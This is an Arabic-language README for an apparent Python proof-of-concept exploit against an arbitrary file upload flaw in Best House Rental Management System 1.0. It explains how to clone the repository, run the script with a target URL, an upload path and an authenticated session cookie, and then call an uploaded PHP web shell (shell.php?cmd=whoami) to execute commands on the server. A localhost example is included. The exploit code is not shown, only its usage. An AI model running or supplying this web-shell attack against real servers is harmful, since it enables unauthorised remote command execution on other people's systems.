
نص برمجي بلغة Python لإثبات المفهوم (PoC) يستغل ثغرة رفع ملف تعسفي في نظام إدارة تأجير المنازل الأفضل (Best House Rental Management System) الإصدار 1.0 لرفع غلاف ويب PHP وتنفيذ أوامر عن بُعد.
يشرح هذا السكريبت بلغة بايثون كيفية استغلال ثغرة رفع الملفات التعسفية في Best House Rental Management System 1.0. تسمح الثغرة للمهاجم برفع ملف ضار (مثل قشرة ويب PHP) وتنفيذ أوامر تعسفية على الخادم المستهدف.
استنسخ المستودع وانتقل إلى الدليل:
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
شغّل أداة الاستغلال باستخدام المعاملات التالية:
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: عنوان URL لصفحة رفع الملفات القابلة للاستغلال (مثال: http:///rental/admin_class.php?view=save_settings) file_upload_path: المسار الذي تُخزَّن فيه الملفات المرفوعة (مثال: http:///path/to/uploaded/files) session_cookie: كعكة الجلسة للمستخدم المُوثَّق
إذا نجحت، ستتمكن من تنفيذ الأوامر على الخادم المستهدف من خلال زيارة:
bash
http://<file_upload_path>/shell.php?cmd=whoami
اختبره بتنفيذ أوامر مثل whoami أو uname -a.
مثال
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
هذا الكود مُصدر تحت رخصة MIT.